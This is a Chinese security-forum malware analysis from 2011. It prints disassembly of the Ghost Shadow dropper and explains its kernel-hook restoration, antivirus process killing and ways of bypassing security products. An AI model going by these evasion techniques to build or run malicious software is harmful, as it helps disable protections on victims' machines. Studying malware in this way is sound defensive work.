标 题: 【申精】鬼影母体R3部分分析
作 者: 苏
时 间: 2011-03-30,16:40:30
链 接: http://bbs.pediy.com/showthread.php?t=131317
这是前段时间比较牛X的一个病毒
里面用到的一些手段很不错
特拿来分析,与大家共享
不说废话,直接开始分析
先上个OD大图,给大家一个流程感
代码:
00404612 >/$ 55 push ebp 00404613 |. 8BEC mov ebp, esp 00404615 |. 81EC 580A0000 sub esp, 0A58 0040461B |. 53 push ebx 0040461C |. 56 push esi 0040461D |. 57 push edi 0040461E |. 6A 1D push 1D 00404620 |. 33DB xor ebx, ebx 00404622 |. 59 pop ecx 00404623 |. 33C0 xor eax, eax 00404625 |. 8DBD 4DFFFFFF lea edi, dword ptr [ebp-B3] 0040462B |. 889D 4CFFFFFF mov byte ptr [ebp-B4], bl 00404631 |. 6A 1D push 1D 00404633 |. F3:AB rep stos dword ptr es:[edi] 00404635 |. 66:AB stos word ptr es:[edi] 00404637 |. AA stos byte ptr es:[edi] 00404638 |. 59 pop ecx 00404639 |. 33C0 xor eax, eax 0040463B |. 8DBD D1FDFFFF lea edi, dword ptr [ebp-22F] 00404641 |. 889D D0FDFFFF mov byte ptr [ebp-230], bl 00404647 |. F3:AB rep stos dword ptr es:[edi] 00404649 |. 66:AB stos word ptr es:[edi] 0040464B |. AA stos byte ptr es:[edi] 0040464C |. E8 21F0FFFF call 00403672 ; 载入函数库 00404651 |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC] 00404657 |. 50 push eax 00404658 |. E8 75FCFFFF call 004042D2 ; 获得系统目录,组合字符串 0040465D |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC] 00404663 |. C70424 607740>mov dword ptr [esp], 00407760 0040466A |. 50 push eax 0040466B |. FF15 78774000 call dword ptr [407778] 00404671 |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC] 00404677 |. 50 push eax 00404678 |. FF15 74774000 call dword ptr [407774] 0040467E |. 83C4 0C add esp, 0C 00404681 |. 8BF0 mov esi, eax 00404683 |. 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C] 00404689 |. 68 04010000 push 104 ; /BufSize = 104 (260.) 0040468E |. 50 push eax ; |PathBuffer 0040468F |. 53 push ebx ; |hModule 00404690 |. FF15 6C604000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA 00404696 |. 8D85 B8F9FFFF lea eax, dword ptr [ebp-648] 0040469C |. C785 B8F9FFFF>mov dword ptr [ebp-648], 94 004046A6 |. 50 push eax ; /pVersionInformation 004046A7 |. FF15 E4604000 call dword ptr [<&KERNEL32.GetVersion>; \GetVersionExA 004046AD |. 83BD BCF9FFFF>cmp dword ptr [ebp-644], 5 ; 判断操作系统版本,只感染xp 004046B4 |. 74 05 je short 004046BB 004046B6 |. E8 42CBFFFF call 004011FD 004046BB |> 83BD C0F9FFFF>cmp dword ptr [ebp-640], 1 004046C2 |. 74 05 je short 004046C9 004046C4 |. E8 34CBFFFF call 004011FD 004046C9 |> 68 50774000 push 00407750 ; /MutexName = "Q360MonMutex" 004046CE |. 53 push ebx ; |InitialOwner 004046CF |. 53 push ebx ; |pSecurity 004046D0 |. FF15 E0604000 call dword ptr [<&KERNEL32.CreateMute>; \CreateMutexA 004046D6 |. FF15 58604000 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError 004046DC |. 3D B7000000 cmp eax, 0B7 ; 检测360 004046E1 |. 74 34 je short 00404717 004046E3 |. 6A 01 push 1 004046E5 |. E8 27D5FFFF call 00401C11 ; 恢复SSDT 004046EA |. 59 pop ecx 004046EB |. E8 E1CDFFFF call 004014D1 ; nop 004046F0 |> E8 A7E0FFFF /call 0040279C ; 结束卡巴 004046F5 |. 85C0 |test eax, eax 004046F7 |. 74 0D |je short 00404706 004046F9 |. 68 E8030000 |push 3E8 ; /Timeout = 1000. ms 004046FE |. FF15 BC604000 |call dword ptr [<&KERNEL32.Sleep>] ; \Sleep 00404704 |.^ EB EA \jmp short 004046F0 00404706 |> 6A 01 push 1 00404708 |. 6A 02 push 2 0040470A |. 68 931A4000 push 00401A93 0040470F |. E8 CECEFFFF call 004015E2 ; 对抗其他杀软 00404714 |. 83C4 0C add esp, 0C 00404717 |> 68 F4010000 push 1F4 ; /Timeout = 500. ms 0040471C |. FF15 BC604000 call dword ptr [<&KERNEL32.Sleep>] ; \Sleep 00404722 |. E8 3CFCFFFF call 00404363 ; 释放sys与ini文件 00404727 |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC] 0040472D |. 50 push eax 0040472E |. 8D85 4CFFFFFF lea eax, dword ptr [ebp-B4] 00404734 |. 50 push eax 00404735 |. FF15 70774000 call dword ptr [407770] 0040473B |. 59 pop ecx 0040473C |. C68435 4CFFFF>mov byte ptr [ebp+esi-B4], 30 00404744 |. 59 pop ecx 00404745 |. C68435 4DFFFF>mov byte ptr [ebp+esi-B3], 30 0040474D |. C68435 4EFFFF>mov byte ptr [ebp+esi-B2], 30 ; 释放00000000 00404755 |. 53 push ebx ; /hTemplateFile 00404756 |. C68435 4FFFFF>mov byte ptr [ebp+esi-B1], 30 ; | 0040475E |. 68 80000000 push 80 ; |Attributes = NORMAL 00404763 |. C68435 50FFFF>mov byte ptr [ebp+esi-B0], 30 ; | 0040476B |. 6A 03 push 3 ; |Mode = OPEN_EXISTING 0040476D |. C68435 51FFFF>mov byte ptr [ebp+esi-AF], 30 ; | 00404775 |. 53 push ebx ; |pSecurity 00404776 |. C68435 52FFFF>mov byte ptr [ebp+esi-AE], 30 ; | 0040477E |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE 00404780 |. 8D85 4CFFFFFF lea eax, dword ptr [ebp-B4] ; | 00404786 |. C68435 53FFFF>mov byte ptr [ebp+esi-AD], 30 ; | 0040478E |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE 00404793 |. C68435 54FFFF>mov byte ptr [ebp+esi-AC], 30 ; | 0040479B |. 50 push eax ; |FileName 0040479C |. 889C35 55FFFF>mov byte ptr [ebp+esi-AB], bl ; | 004047A3 |. FF15 04614000 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA 004047A9 |. 8BF8 mov edi, eax 004047AB |. 83FF FF cmp edi, -1 004047AE |. 897D FC mov dword ptr [ebp-4], edi 004047B1 |. 75 05 jnz short 004047B8 004047B3 |. E8 45CAFFFF call 004011FD 004047B8 |> 53 push ebx ; /pFileSizeHigh 004047B9 |. 57 push edi ; |hFile 004047BA |. FF15 FC604000 call dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize 004047C0 |. 6A 40 push 40 ; /Protect = PAGE_EXECUTE_READWRITE 004047C2 |. 68 00100000 push 1000 ; |AllocationType = MEM_COMMIT 004047C7 |. 50 push eax ; |Size 004047C8 |. 53 push ebx ; |Address 004047C9 |. 8945 F8 mov dword ptr [ebp-8], eax ; | 004047CC |. 895D F0 mov dword ptr [ebp-10], ebx ; | 004047CF |. 8945 E8 mov dword ptr [ebp-18], eax ; | 004047D2 |. FF15 24614000 call dword ptr [<&KERNEL32.VirtualAll>; \VirtualAlloc 004047D8 |. 8BF0 mov esi, eax 004047DA |. 8D45 F0 lea eax, dword ptr [ebp-10] 004047DD |. 53 push ebx ; /pOverlapped 004047DE |. 50 push eax ; |pBytesRead 004047DF |. FF75 F8 push dword ptr [ebp-8] ; |BytesToRead 004047E2 |. 56 push esi ; |Buffer 004047E3 |. 57 push edi ; |hFile 004047E4 |. FF15 0C614000 call dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile 004047EA |. 8B4D F8 mov ecx, dword ptr [ebp-8] 004047ED |. 8BC6 mov eax, esi 004047EF |. 03CE add ecx, esi 004047F1 |. 3BF1 cmp esi, ecx 004047F3 |. 73 0D jnb short 00404802 004047F5 |> 8138 76620D78 /cmp dword ptr [eax], 780D6276 004047FB |. 74 05 |je short 00404802 004047FD |. 40 |inc eax 004047FE |. 3BC1 |cmp eax, ecx 00404800 |.^ 72 F3 \jb short 004047F5 00404802 |> 68 48010000 push 148 00404807 |. 68 94744000 push 00407494 0040480C |. 50 push eax 0040480D |. FF15 7C774000 call dword ptr [40777C] 00404813 |. 8B46 3C mov eax, dword ptr [esi+3C] 00404816 |. 83C4 0C add esp, 0C 00404819 |. 05 50010000 add eax, 150 0040481E |. 8945 F0 mov dword ptr [ebp-10], eax 00404821 |. 03C6 add eax, esi 00404823 |. 53 push ebx 00404824 |. 8B48 0C mov ecx, dword ptr [eax+C] 00404827 |. 894D F8 mov dword ptr [ebp-8], ecx 0040482A |. 8B40 08 mov eax, dword ptr [eax+8] 0040482D |. 8945 F0 mov dword ptr [ebp-10], eax 00404830 |. 50 push eax 00404831 |. 8D040E lea eax, dword ptr [esi+ecx] 00404834 |. 50 push eax 00404835 |. E8 FCF9FFFF call 00404236 0040483A |. 53 push ebx ; /Origin 0040483B |. 53 push ebx ; |pOffsetHi 0040483C |. 53 push ebx ; |OffsetLo 0040483D |. 57 push edi ; |hFile 0040483E |. 8B3D 08614000 mov edi, dword ptr [<&KERNEL32.SetFi>; |kernel32.SetFilePointer 00404844 |. FFD7 call edi ; \SetFilePointer 00404846 |. 8D45 F0 lea eax, dword ptr [ebp-10] 00404849 |. 53 push ebx ; /pOverlapped 0040484A |. 50 push eax ; |pBytesWritten 0040484B |. FF75 E8 push dword ptr [ebp-18] ; |nBytesToWrite 0040484E |. 56 push esi ; |Buffer 0040484F |. FF75 FC push dword ptr [ebp-4] ; |hFile 00404852 |. FF15 00614000 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile 00404858 |. 68 00400000 push 4000 ; /FreeType = MEM_DECOMMIT 0040485D |. FF75 E8 push dword ptr [ebp-18] ; |Size 00404860 |. 56 push esi ; |Address 00404861 |. FF15 1C614000 call dword ptr [<&KERNEL32.VirtualFre>; \VirtualFree 00404867 |. FF75 FC push dword ptr [ebp-4] ; /hObject 0040486A |. FF15 14614000 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle 00404870 |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC] 00404876 |. 50 push eax 00404877 |. 8D85 D0FDFFFF lea eax, dword ptr [ebp-230] 0040487D |. 50 push eax 0040487E |. FF15 70774000 call dword ptr [407770] 00404884 |. 8D85 D0FDFFFF lea eax, dword ptr [ebp-230] 0040488A |. 50 push eax 0040488B |. FF15 74774000 call dword ptr [407774] 00404891 |. 8BF0 mov esi, eax 00404893 |. 83C4 0C add esp, 0C 00404896 |. 8D85 D0FDFFFF lea eax, dword ptr [ebp-230] 0040489C |. C68435 D0FDFF>mov byte ptr [ebp+esi-230], 30 004048A4 |. C68435 D1FDFF>mov byte ptr [ebp+esi-22F], 30 004048AC |. C68435 D2FDFF>mov byte ptr [ebp+esi-22E], 30 004048B4 |. C68435 D3FDFF>mov byte ptr [ebp+esi-22D], 30 004048BC |. C68435 D4FDFF>mov byte ptr [ebp+esi-22C], 30 ; 复制成一个新文件 004048C4 |. 53 push ebx ; /FailIfExists 004048C5 |. C68435 D5FDFF>mov byte ptr [ebp+esi-22B], 30 ; | 004048CD |. 50 push eax ; |NewFileName 004048CE |. C68435 D6FDFF>mov byte ptr [ebp+esi-22A], 30 ; | 004048D6 |. 8D85 4CFFFFFF lea eax, dword ptr [ebp-B4] ; | 004048DC |. C68435 D7FDFF>mov byte ptr [ebp+esi-229], 30 ; | 004048E4 |. C68435 D8FDFF>mov byte ptr [ebp+esi-228], 31 ; | 004048EC |. 50 push eax ; |ExistingFileName 004048ED |. 889C35 D9FDFF>mov byte ptr [ebp+esi-227], bl ; | 004048F4 |. FF15 D0604000 call dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA 004048FA |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC] 00404900 |. 50 push eax 00404901 |. 8D85 4CFFFFFF lea eax, dword ptr [ebp-B4] 00404907 |. 50 push eax 00404908 |. FF15 70774000 call dword ptr [407770] 0040490E |. C68435 4CFFFF>mov byte ptr [ebp+esi-B4], 61 00404916 |. C68435 4DFFFF>mov byte ptr [ebp+esi-B3], 74 0040491E |. C68435 4EFFFF>mov byte ptr [ebp+esi-B2], 69 00404926 |. C68435 4FFFFF>mov byte ptr [ebp+esi-B1], 78 0040492E |. C68435 50FFFF>mov byte ptr [ebp+esi-B0], 69 00404936 |. 59 pop ecx 00404937 |. C68435 51FFFF>mov byte ptr [ebp+esi-AF], 2E 0040493F |. C68435 52FFFF>mov byte ptr [ebp+esi-AE], 73 00404947 |. 59 pop ecx 00404948 |. C68435 53FFFF>mov byte ptr [ebp+esi-AD], 79 00404950 |. C68435 54FFFF>mov byte ptr [ebp+esi-AC], 73 00404958 |. 889C35 55FFFF>mov byte ptr [ebp+esi-AB], bl 0040495F |. 68 34774000 push 00407734 ; /EventName = "Jiangmin_WallNotify_Notify" 00404964 |. 53 push ebx ; |InitiallySignaled 00404965 |. 53 push ebx ; |ManualReset 00404966 |. 53 push ebx ; |pSecurity 00404967 |. FF15 B0604000 call dword ptr [<&KERNEL32.CreateEven>; \CreateEventA 0040496D |. FF15 58604000 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError 00404973 |. 3D B7000000 cmp eax, 0B7 00404978 |. 0F85 0F020000 jnz 00404B8D ; 判断是否存在江民 0040497E |. B9 81000000 mov ecx, 81 ; 下面是绕过江民主防部分 00404983 |. 33C0 xor eax, eax
1.病毒首先判断OS版本,只感染特定的windows系统,并且保证内存映像的唯一
2.先提升进程权限,在通过NtQuerySystemInformation获得ntoskrnl在磁盘里的真名,在通过到处SSDT表,将原始的SSDT表内容读取出来,然后通过ZwSystemDebugControl直接写物理实际内存,从而恢复SSDT,然后用同样的手法恢复了
PsSetLoadImageNotifyRoutine
PsSetCreateProcessNotifyRoutine
PsSetCreateThreadNotifyRoutine
这三个函数,由于函数太长,就不截取OD里的,详细见IDA里的注释
3.病毒遍历进程,寻找卡巴进程,然后破坏进程
4.病毒释放驱动,驱动配置文件,木马下载器在
C:\Program files\MSDN\
目录下
5.通过创建互斥量方法判断江民杀毒软件是否存在,存在的话,绕过其主防
6.病毒在通过硬件驱动类型加载方式加载驱动,以躲避主防的驱动加载监控
读写物理内存那块看的头晕,所有我就用C语言把它还原了,见附件
行为一个个用OD截取很麻烦
所有直接吧IDB放上去,大家可以对应的看
过几天我在吧驱动部分分析发上来